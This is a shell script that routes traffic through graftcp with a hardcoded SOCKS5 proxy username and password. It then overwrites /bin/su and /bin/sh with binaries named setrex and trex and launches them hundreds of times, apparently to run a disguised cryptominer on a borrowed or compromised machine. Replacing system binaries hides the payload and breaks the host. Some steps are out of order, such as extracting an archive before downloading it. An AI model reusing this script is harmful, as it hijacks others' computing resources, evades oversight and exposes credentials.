export LD_PRELOAD=

tar -xvzf graftcp.tar.gz
wget https://github.com/hmgle/graftcp/archive/refs/tags/v0.4.0.tar.gz
tar -xvzf v0.4.0.tar.gz
sudo apt-get install -y local
sudo apt-get update
./graftcp/graftcp apt update;apt -y install curl unzip autoconf git cmake binutils build-essential net-tools screen golang
cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
pipepath = /tmp/graftcplocal.fifo
socks5 = 45.82.84.76:59111
socks5_username = snoopyme9
socks5_password = FZHc9Tt5sq
http_proxy = 127.0.0.1:8080
END
./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &
sleep .2

echo " "
echo " "

echo ""
./graftcp/graftcp curl ifconfig.me
cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
logfile = graftcp-local.log
loglevel = 1
pipepath = /tmp/graftcplocal.fifo
socks5 = 72.195.34.59:4145
socks5_username = 
socks5_password = 
http_proxy = 127.0.0.1:8080
END
./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &
sleep .2

echo " "
echo " "

echo ""

./graftcp/graftcp curl ifconfig.me

mv setrex /bin/su
./graftcp/graftcp chmod +x /bin/su 
mv setrex2 /bin/su2
./graftcp/graftcp chmod +x /bin/su2 
mv trex /bin/sh
./graftcp/graftcp chmod +x /bin/sh 

sleep 5s
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
